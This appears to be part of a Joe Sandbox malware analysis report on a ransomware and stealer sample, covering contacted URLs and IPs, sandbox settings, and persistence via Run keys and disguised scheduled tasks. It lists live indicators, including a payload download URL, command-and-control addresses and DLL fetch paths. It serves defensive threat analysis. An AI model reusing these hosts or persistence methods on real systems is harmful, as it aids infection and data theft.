https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonR	E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199689717899(J$-	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/I	build2.exe, 00000013.00000003.2514930235.00000000008A5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sdfjhuz.com/dl/build2.exe$run	E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/tography	build2.exe, 00000013.00000003.2156939086.0000000000812000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?R	explorer.exe, 0000002A.00000003.2709284810.0000000008F4F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2708310772.0000000008F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://checkout.steampowered.com/	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/.	build2.exe, 00000013.00000003.2353603355.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342899375.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2341806768.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342259804.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342809334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2373219434.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2342138297.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	false	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonJ	E609.exe, 0000001B.00000002.2211670319.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2210896426.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.00000000007D1000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/crime/fingerprints-on-ransom-n	explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://65.109.242.59DHIE	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonG	E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/softokn3.dll3e	build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.amazon.com/	E609.exe, 0000000F.00000003.2126285857.0000000009840000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1689675941.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1690859356.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1689226860.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.twitter.com/	E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net/recaptcha/;	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://65.109.242.59/vcruntime140.dll65.109.242.59	build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/$ix-	build2.exe, 00000013.00000002.2663278860.00000000007B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonje	E609.exe, 00000021.00000002.2275857903.00000000006C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://broadcast.st.dl.eccdnx.com	build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonq	E609.exe, 0000001B.00000002.2211493780.0000000000748000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
189.163.126.89	sdfjhuz.com	Mexico	8151	UninetSAdeCVMX	true
103.174.152.66	safeautomationbd.com	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
104.102.42.29	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
65.109.242.59	unknown	United States	11022	ALABANZA-BALTUS	false
193.233.132.167	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
91.92.253.69	unknown	Bulgaria	34368	THEZONEBG	true
185.154.13.143	unknown	Ukraine	204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true
213.172.74.157	cajgtus.com	Azerbaijan	13099	AET-ASAZ	true
192.185.16.114	nessotechbd.com	United States	46606	UNIFIEDLAYER-AS-1US	true
188.114.96.3	api.2ip.ua	European Union	13335	CLOUDFLARENETUS	false
158.160.165.129	trad-einmyus.com	Venezuela	721	DNIC-ASBLK-00721-00726US	true
104.196.109.209	transfer.adttemp.com.br	United States	15169	GOOGLEUS	false
162.159.134.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447536
Start date and time:	2024-05-25 21:28:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@58/276@14/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 96 Number of non-executed functions: 231
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, SearchApp.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.23.209.182, 2.23.209.130, 2.23.209.149, 2.23.209.133, 2.23.209.140, 2.23.209.187, 2.23.209.179, 2.20.142.154, 2.20.142.180, 92.122.215.65, 2.20.142.251, 92.122.215.57, 92.122.215.53, 2.20.142.187, 2.20.142.3
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, r.bing.com.edgekey.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, p-static.bing.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, login.live.com, r.bing.com, wwwprod.www-bing-com.akadns.net, api-msn-com.a-0003.a-msedge.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:29:06	API Interceptor	3715x Sleep call for process: explorer.exe modified
15:29:43	API Interceptor	1x Sleep call for process: E609.exe modified
15:29:58	API Interceptor	1x Sleep call for process: build2.exe modified
15:30:49	API Interceptor	50x Sleep call for process: mstsca.exe modified
20:29:23	Task Scheduler	Run new task: Firefox Default Browser Agent 9CC243F0937B7EFB path: C:\Users\user\AppData\Roaming\rujtcgu
20:29:38	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
20:29:39	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe s>--Task
20:29:49	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
20:29:58	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.174.152.66	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse
	fx28wfnZ4J.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader, SmokeLoader	Browse
104.102.42.29	file.exe	Get hash	malicious	Vidar	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	https://bitly.cx/LmuIz	Get hash	malicious	Unknown	Browse
	https://steamcomnumitly.com/get/spring/afaFJ4a/50	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	mQPyKe8cqn.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	BI6oo9z4In.exe	Get hash	malicious	CryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	https://steamcommunnittly.com/gift/activation/feor37565hFh6dse	Get hash	malicious	Unknown	Browse
65.109.242.59	file.exe	Get hash	malicious	Vidar	Browse
	CHA0VZiz8y.exe	Get hash	malicious	CryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe	Get hash	malicious	CryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine	Browse
193.233.132.167	XVM5nluelx.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	193.233.132.167/lend/jfesawdr.exe
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	193.233.132.167/lend/jfesawdr.exe
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	193.233.132.167/lend/jfesawdr.exe
	SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe	Get hash	malicious	Amadey, RedLine, RisePro Stealer	Browse	193.233.132.167/enigma/index.php
	UeW2b6mU6Z.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	193.233.132.167/enigma/index.php
